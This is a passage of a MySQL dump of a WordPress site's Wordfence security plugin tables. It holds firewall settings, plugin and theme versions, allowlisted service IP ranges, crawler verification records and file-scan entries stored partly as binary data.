";b:0;s:4:\"link\";b:0;}i:7;a:4:{s:4:\"slug\";s:9:\"wp-cerber\";s:11:\"fromVersion\";s:5:\"8.9.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),('vulnerabilities_theme','a:3:{i:0;a:4:{s:4:\"slug\";s:14:\"twentynineteen\";s:9:\"toVersion\";s:3:\"2.1\";s:11:\"fromVersion\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;}i:1;a:4:{s:4:\"slug\";s:12:\"twentytwenty\";s:9:\"toVersion\";s:3:\"1.8\";s:11:\"fromVersion\";s:3:\"1.7\";s:10:\"vulnerable\";b:0;}i:2;a:4:{s:4:\"slug\";s:15:\"twentytwentyone\";s:9:\"toVersion\";s:3:\"1.4\";s:11:\"fromVersion\";s:3:\"1.3\";s:10:\"vulnerable\";b:0;}}','yes'),('wafAlertInterval','600','yes'),('wafAlertLastSendTime','1628433016','yes'),('wafAlertOnAttacks','1','yes'),('wafAlertThreshold','100','yes'),('wafAlertWhitelist','','yes'),('waf_status','enabled','yes'),('wfKillRequested','0','no'),('wfPeakMemory','16777216','no'),('wfScanStartVersion','5.8.1','yes'),('wfsd_engine','','no'),('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),('wf_scanLastStatusTime','0','yes'),('wf_scanRunning','','yes'),('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1631537673;}','yes'),('whitelisted','','yes'),('whitelistedServices','{}','yes'),('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),('wordfenceI18n','1','yes'),('wordpressPluginVersions','a:8:{s:7:\"akismet\";s:6:\"4.1.10\";s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"4.4.9\";s:17:\"disable-gutenberg\";s:5:\"2.5.1\";s:5:\"hello\";s:5:\"1.7.2\";s:11:\"redirection\";s:5:\"5.1.3\";s:9:\"wordfence\";s:5:\"7.5.5\";s:9:\"wp-cerber\";s:5:\"8.9.3\";s:13:\"wordpress-seo\";s:4:\"16.9\";}','yes'),('wordpressThemeVersions','a:4:{s:14:\"twentynineteen\";s:3:\"2.1\";s:12:\"twentytwenty\";s:3:\"1.8\";s:15:\"twentytwentyone\";s:3:\"1.4\";s:4:\"vega\";s:5:\"3.0.0\";}','yes'),('wordpressVersion','5.8.1','yes'),('wp_home_url','https://housing-today.co.uk','yes'),('wp_site_url','https://housing-today.co.uk','yes');
/*!40000 ALTER TABLE `wp_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfcrawlers`
--
DROP TABLE IF EXISTS `wp_wfcrawlers`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfcrawlers` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`patternSig` binary(16) NOT NULL,
`status` char(8) NOT NULL,
`lastUpdate` int(10) unsigned NOT NULL,
`PTR` varchar(255) DEFAULT '',
PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfcrawlers`
--
LOCK TABLES `wp_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wp_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wp_wfcrawlers` VALUES ('\0\0\0\0\0\0\0\0\0\0��@b,','i��| ��OoD!���','verified',1631090045,''),('\0\0\0\0\0\0\0\0\0\0��@b,','�����>�b0�oQ1��','badPTR',1631090044,'64.21.98.44'),('\0\0\0\0\0\0\0\0\0\0��B�@�','�����>�b0�oQ1��','verified',1631192779,'crawl-66-249-64-135.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@�','�����>�b0�oQ1��','verified',1631189003,'crawl-66-249-64-145.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@�','�����>�b0�oQ1��','verified',1631192580,'crawl-66-249-64-151.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�AC','�����>�b0�oQ1��','verified',1631587565,'crawl-66-249-65-67.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�AG','�����>�b0�oQ1��','verified',1631544179,'crawl-66-249-65-71.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�AI','�����>�b0�oQ1��','verified',1631572075,'crawl-66-249-65-73.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B','�����>�b0�oQ1��','verified',1631117381,'crawl-66-249-66-5.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B','�����>�b0�oQ1��','verified',1631109442,'crawl-66-249-66-7.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B ','�����>�b0�oQ1��','verified',1631117382,'crawl-66-249-66-9.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B','�����>�b0�oQ1��','verified',1631140297,'crawl-66-249-66-11.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B\r','�����>�b0�oQ1��','verified',1631123325,'crawl-66-249-66-13.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�E�','�����>�b0�oQ1��','verified',1631284463,'crawl-66-249-69-165.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�E�','�����>�b0�oQ1��','verified',1631279068,'crawl-66-249-69-167.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�E�','�����>�b0�oQ1��','verified',1631282005,'crawl-66-249-69-169.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�Fi','�����>�b0�oQ1��','verified',1631196184,'crawl-66-249-70-105.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�Fk','�����>�b0�oQ1��','verified',1631248993,'crawl-66-249-70-107.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�Fm','�����>�b0�oQ1��','verified',1631189002,'crawl-66-249-70-109.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�HI','�����>�b0�oQ1��','verified',1631330948,'crawl-66-249-72-73.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�HK','�����>�b0�oQ1��','verified',1631275293,'crawl-66-249-72-75.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�HU','�����>�b0�oQ1��','verified',1631282002,'crawl-66-249-72-85.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�Iw','�����>�b0�oQ1��','verified',1631615593,'crawl-66-249-73-119.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�Iy','�����>�b0�oQ1��','verified',1631572074,'crawl-66-249-73-121.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�LC','�����>�b0�oQ1��','verified',1631382984,'crawl-66-249-76-67.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�LG','�����>�b0�oQ1��','verified',1631442947,'crawl-66-249-76-71.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�LI','�����>�b0�oQ1��','verified',1631371446,'crawl-66-249-76-73.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�L�','�����>�b0�oQ1��','verified',1631442828,'crawl-66-249-76-232.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�L�','�����>�b0�oQ1��','verified',1631428188,'crawl-66-249-76-234.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�L�','�����>�b0�oQ1��','verified',1631442828,'crawl-66-249-76-236.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��_��t','i��| ��OoD!���','verified',1631343898,''),('\0\0\0\0\0\0\0\0\0\0��_��t','�����>�b0�oQ1��','badPTR',1631343898,'datacrawler-01.4server.su'),('\0\0\0\0\0\0\0\0\0\0���n\r','i��| ��OoD!���','verified',1631473827,''),('\0\0\0\0\0\0\0\0\0\0���n\r','�����>�b0�oQ1��','badPTR',1631473826,'194.110.13.14'),('\0\0\0\0\0\0\0\0\0\0���c.�','i��| ��OoD!���','verified',1631023165,''),('\0\0\0\0\0\0\0\0\0\0���c.�','�����>�b0�oQ1��','badPTR',1631023164,'207.99.46.205'),('\0\0\0\0\0\0\0\0\0\0����a','i��| ��OoD!���','verified',1631328456,''),('\0\0\0\0\0\0\0\0\0\0����a','�����>�b0�oQ1��','badPTR',1631328455,'209.250.254.97.vultr.com');
/*!40000 ALTER TABLE `wp_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wffilechanges`
--
DROP TABLE IF EXISTS `wp_wffilechanges`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilechanges` (
`filenameHash` char(64) NOT NULL,
`file` varchar(1000) NOT NULL,
`md5` char(32) NOT NULL,
PRIMARY KEY (`filenameHash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wffilechanges`
--
LOCK TABLES `wp_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wp_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wffilemods`
--
DROP TABLE IF EXISTS `wp_wffilemods`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilemods` (
`filenameMD5` binary(16) NOT NULL,
`filename` varchar(1000) NOT NULL,
`knownFile` tinyint(3) unsigned NOT NULL,
`oldMD5` binary(16) NOT NULL,
`newMD5` binary(16) NOT NULL,
`SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
`stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
`isSafeFile` varchar(1) NOT NULL DEFAULT '?',
PRIMARY KEY (`filenameMD5`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wffilemods`
--
LOCK TABLES `wp_wffilemods` WRITE;
/*!40000 ALTER TABLE `wp_wffilemods` DISABLE KEYS */;
INSERT INTO `wp_wffilemods` VALUES ('\0���VF�@��','wp-content/uploads/2019/08/nature-3336524_960_720-300x200.jpg',0,'�p�0�ԃgs��J�','�p�0�ԃgs��J�','�\n#�R\ZZ\r����$=53c�S���bb��','',0,'?'),('\0gR/$e�l�uX�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/tr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d=E��b.e�m�|','��kWW_W���˞�&��xr,xت63@]�','',0,'?'),('\0?H�\0�E}�����\"�','wp-includes/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),('\0)4\nTY��d4G~�','wp-includes/images/w-logo-blue-white-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),('\00��#�9���Z4�j$','wp-admin/network/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�d4VڋS~tɱ�ź','�o�ᕑ�\"t�y�S�����M8�!9/�?Y�X�','',0,'?'),('\05g���c�0�\"D','wp-includes/css/media-views-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z:��א�;\\�����','�k�K�SF_D|�\r��V����\'b���l��I�','',0,'?'),('\08�<lc�ˊ�gg)9�','wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^��L��U�\n��i�','%LIf͕�}��Y�9���&yH��2nh','',0,'?'),('\0C_\n��jD��@k','wp-admin/network/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�)��&�c���','1�t/g�7O�$�U~�4n7�Z\Z�;u��)�dk��n','',0,'?'),('\0G���M(��YlWz�!','wp-includes/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZ�����:!�ټ�','3�l�@���o�-�3